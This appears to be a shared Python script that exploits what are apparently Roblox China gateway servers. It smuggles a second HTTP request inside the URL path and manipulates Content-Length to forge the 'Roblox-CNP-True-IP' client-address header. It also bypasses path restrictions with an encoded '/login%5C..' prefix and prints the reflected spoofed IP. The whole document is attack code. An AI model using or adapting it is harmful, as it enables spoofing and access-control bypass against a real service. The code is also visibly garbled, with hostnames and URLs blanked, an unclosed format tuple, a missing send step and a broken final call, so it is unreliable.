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Created February 28, 2023 20:19
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# 2021-04-11
# 2021-04-11
from http.client import HTTPResponse
from urllib.parse import urlsplit, unquote, quote
import socket
import ssl
import requests
import json
REAL_IP = requests.get("").json()["ip"]
def spoof_request(method, url, headers=None, data=None, ip=None):
purl = urlsplit(url)
path = purl.path + ("?" + purl.query if purl.query else "")
# bypass path restrictions on
if purl.hostname == "":
path = "/login%5C.." + path.replace("/", "%5C")
conn = socket.create_connection((purl.hostname.replace("", ""), 443))
context = ssl.create_default_context()
conn = context.wrap_socket(conn, server_hostname=purl.hostname.replace("", ""))
# payload that'll "override" the request
payload = ""
payload += " HTTP/1.1\r\n"
payload += "Host: %s\r\n" % purl.hostname
payload += "Content-Length: *\r\n"
payload += "Roblox-CNP-True-IP: %s\r\n" % ip
if headers:
for key, value in headers.items():
payload += "%s: %s\r\n" % (key, value)
payload += "\r\n"
if data:
payload += data
# calculate the content-length overhead
# (the actual content of this doesn't matter, only the length)
overhead = ""
overhead += " HTTP/1.1\r\n"
overhead += "Connection: keep-alive\r\n"
overhead += "Host: %s\r\n" % purl.hostname.lower().replace("", "", 1)
overhead += "Roblox-Domain: cn\r\n"
overhead += "Roblox-CNP-Date: 2021-03-06T20:41:52 08:00\r\n"
overhead += "Roblox-CNP-Secure: cnGgYV/BzUMyhjw3iIiKi0TD6Q0=\r\n"
overhead += "Roblox-CNP-True-IP: %s\r\n" % REAL_IP
# funnily enough, this header is also left unencoded
overhead += "Roblox-CNP-Url: http://%s%s%s\r\n" % (
purl.hostname.lower().replace("", ""),
overhead += "Content-Length: 0\r\n"
overhead += "X-Stgw-Time: 1615034512.456\r\n"
overhead += "X-Client-Proto: https\r\n"
overhead += "X-Forwarded-Proto: https\r\n"
overhead += "X-Client-Proto-Ver: HTTP/1.1\r\n"
overhead += "X-Real-IP: %s\r\n" % REAL_IP
overhead += "X-Forwarded-For: %s\r\n\r\n" % REAL_IP
overhead = overhead.replace("*", str(len(overhead)))
payload = payload.replace("*", str(len(overhead)))
# the "real" request that is sent
request = ""
request += "%s %s%s HTTP/1.1\r\n" % (method, path, quote(payload))
request += "Host: %s\r\n" % purl.hostname.replace("", "")
request += "Content-Length: 0\r\n"
request += "\r\n"
resp = HTTPResponse(conn)
return resp
if __name__ == "__main__":
response = spoof_request(
data ="UTF-8")
print("Reflected ip: %s" % data.split("ClientIpAddress")[1].split(",")[0])
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